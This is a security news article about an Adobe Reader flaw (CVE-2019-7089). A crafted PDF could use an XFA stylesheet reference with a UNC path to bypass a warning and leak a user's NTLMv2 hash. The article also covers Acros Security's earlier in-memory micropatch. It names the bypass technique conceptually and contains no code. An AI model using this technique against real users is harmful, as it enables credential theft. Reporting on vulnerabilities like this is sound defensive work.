by Danny Bradbury
Adobe has patched a flaw that enabled attackers to slurp a user’s network authentication details – but not before someone else patched it first.
Security researcher Alex Inführ discovered a flaw in Adobe Reader which enabled a malicious PDF file to trigger a callback from the program. A compromised program would communicate with a server using Microsoft’s SMB protocol, sending it the user’s hashed authentication details.
The flaw stemmed from the XML Form Architecture (XFA), which is an XML structure inside a PDF that enables users to fill out forms. Loading a remote XML-based stylesheet relating to XFA with an insecure HTTPS-based URL prompts a file to ask for user confirmation before visiting that URL. By using a Universal Naming Convention (UNC) path, the attacker can stop that security dialog appearing. The result is that the infected file causes the user’s machine to send their NTML (NT Lan Manager) v2 hash to the attacker.
That’s pretty significant, because this hash is the digest of a password for the Windows NT Lan Manager authentication protocol. Various hackers have already detailed methods of cracking the NTLMv2 hash using automated tools.
Adobe released a patch for the flaw yesterday, 12 February 2019, labelling the vulnerability CVE 2019-7089 as a critical data leakage issue. However, security firm Acros Security beat the software vendor to the punch by releasing its own patch on Monday.
Acros’s 0patch service specialises in micropatches, which are applied in memory, rather than in an alteration to the program binary. Micropatches are keyhole surgery, designed to block a specific exploit from compromising a program.
These in-memory patches don’t replace regular software patches, which can make more fundamental structural changes to fix program errors, they’re there to act as a sticking plaster until the …
Author: Danny Bradbury